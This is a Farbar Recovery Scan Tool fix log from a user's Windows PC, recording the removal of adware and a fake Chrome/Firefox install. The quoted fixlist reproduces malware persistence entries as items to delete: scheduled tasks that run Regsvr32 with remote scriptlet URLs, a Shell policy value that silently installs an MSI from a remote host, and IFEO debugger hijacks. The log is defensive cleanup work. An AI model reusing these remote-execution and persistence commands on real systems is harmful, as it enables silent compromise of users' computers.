Fix result of Farbar Recovery Scan Tool (x64) Version: 22-05-2017 Ran by Oli (23-05-2017 16:53:30) Run:1 Running from C:\Users\Oli\Desktop\FRST Loaded Profiles: Oli (Available Profiles: Oli) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== ATTENTION RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] 2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00 C:\Users\Oli\Desktop\BigFarm.lnk C:\Users\Oli\Desktop\big_bang_empire.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. HKU\S-1-5-21-2083115291-1334581206-888238541-1001_Classes\ChromeHTML => key removed successfully "C:\Program Files (x86)\Bagsarah" => removed successfully. "C:\Users\Oli\AppData\Local\Bagsarah" => removed successfully. "C:\Users\Oli\AppData\Roaming\Bagsarah" => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} => key removed successfully C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} => key removed successfully C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4BDE3553-DFE9-4C43-BF35-695B79DE0740} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6EBED432-3F9F-42B1-99AE-71CE5A061BEC} => value removed successfully "C:\Program Files (x86)\Firefox" => removed successfully. "C:\Users\Oli\AppData\Local\Firefox" => removed successfully. "C:\Users\Oli\AppData\Roaming\Firefox" => removed successfully. HKU\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => key removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => key removed successfully HKLM\System\CurrentControlSet\Services\OneDirveSrv => key removed successfully OneDirveSrv => service removed successfully C:\WINDOWS\SysWOW64\33 => moved successfully C:\WINDOWS\SysWOW64\3333333 => moved successfully C:\WINDOWS\SysWOW64\1111 => moved successfully C:\WINDOWS\SysWOW64\1111111 => moved successfully "C:\WINDOWS\SysWOW64\1111" => not found. C:\WINDOWS\SysWOW64\11 => moved successfully C:\WINDOWS\SysWOW64\00 => moved successfully C:\Users\Oli\Desktop\BigFarm.lnk => moved successfully C:\Users\Oli\Desktop\big_bang_empire.lnk => moved successfully C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => moved successfully C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk => moved successfully C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => moved successfully C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk => moved successfully C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk => moved successfully =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 28256931 B Java, Flash, Steam htmlcache => 839 B Windows/system/drivers => 4691697 B Edge => 0 B Chrome => 0 B Firefox => 385175796 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 23485 B systemprofile32 => 128 B LocalService => 25165 B NetworkService => 36698 B Oli => 411667181 B RecycleBin => 33956635 B EmptyTemp: => 831.8 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 16:56:29 ====